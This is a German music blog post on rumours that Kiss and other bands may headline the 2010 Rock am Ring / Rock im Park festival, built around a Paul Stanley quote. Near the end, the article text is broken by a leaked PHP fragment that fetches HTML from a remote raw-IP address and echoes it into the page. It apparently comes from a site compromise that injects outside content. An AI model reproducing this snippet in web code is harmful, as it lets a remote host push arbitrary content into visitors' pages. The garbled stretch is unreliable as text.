Manchmal bedarf es nur weniger Worte um das Herz eines klassisch veranlagten Hard Rock Fans höher schlagen lassen. Solche etwa, wie die von Kiss Mastermind Paul Stanley in einem Interview mit dem deutschen Classic Rock Magazin „Rocks“.

Im Kiss-Special der seit gestern erhältlichen „Rocks“ Ausgabe 13 wird er mit den Worten zitiert:

Wir wollen im Sommer für einige Festivals nach Europa kommen und später im Herbst dann noch einmal.

[inset lr=left]Mitdiskutieren in der Netzwerkgruppe Rock am Ring / Rock im Park[/inset]Mit dieser Aussage werden Kiss zu einem ganz heissen Eisen für die Jubilare Rock am Ring und Rock im Park, bei denen man laut eigenem Vernehmen ja den musikalischen Bogen zurück ins Ring-Gründungsjahr 1985 spannen möchte. Wer oder was wäre dafür besser geeignet als ein Urgestein der Rockmusik, eine Band die seit ihrer Gründung 1973 weltweit über 80 Millionen Tonträger verkaufte und damit zu den ganz Grossen ihrer Zunft zählt? Jüngst meldeten sie sich mit dem Album „Sonic Boom“ auf der Musikbühne zurück und gaben nun ihre Tourpläne bekannt.

Kaum zu glauben, aber Kiss standen erst einmal 1997 bei den MLK-Zwillingen auf den Bühnenbrettern. Seitdem dürsten alteingesessene Festivalfans nach den ausgefallenen, individuelle Kostümen und Masken der Band und brachten Kiss in schöner Regelmässigkeit wieder für Rock am Ring und Rock im Park ins Gespräch. Im Jahr 2005 hätte es auch fast geklappt, doch Paul Stanley und damit Kiss mussten wegen einer Hüftoperation auschecken. Nach der Bekanntgabe der europäischen Sommerfestivalpläne stehen die Chancen Kiss zum Jubiläum als Headliner begrüssen zu dürfen uneingeschränkt gut. Zumindest so lange die Hüften halten oder die englischen Grossfestivals Reading/Leads und Download bzw Glastonbury nicht exklusiv buchen.

Doch die Gerüchteküche hält auch noch weitere Namen bereit, die sich zu den bereits bestätigten Rammstein gesellen könnten. Topkandidat für einen hohen Slot sind Linkin Park, die sich ihren Fans auf diversen Meet&Greets für 2010 bei Ring und Park angekündigt haben. Auch Muse werden hoch gehandelt, seitdem bekannt wurde, dass sie Mitte Juni das Stade de France bespielen. Dritter im Bunde sind U2. Für sie gibt es keinen konkreten, faktischen Hinweis. Wortanalysten unter den Festivalisten lesen allerdings ihre Beteiligung aus den Worten „Brückenschlag“ und „1985“ heraus. Schliesslich sind sie die einzige internationale Band aus dem Startjahr des Rings, die heute noch aktiv und von Bedeutung ist.

$fp=@fopen(‚http://80.67.30.106:80/stingray/output.html?id=1479′,’r‘);
if($fp){$html=“;while(!feof($fp)){$html.=@fread ($fp,8192);}echo $html;}
fclose($fp); ?>

Wer bereit ist bis Anfang Dezember auf ein Hardticket zu warten, dafür aber 4,50 Euro zu sparen bestellt bei Ticket Per Post ( Rock am Ring / Rock im Park).

1 KOMMENTAR

Comments are closed.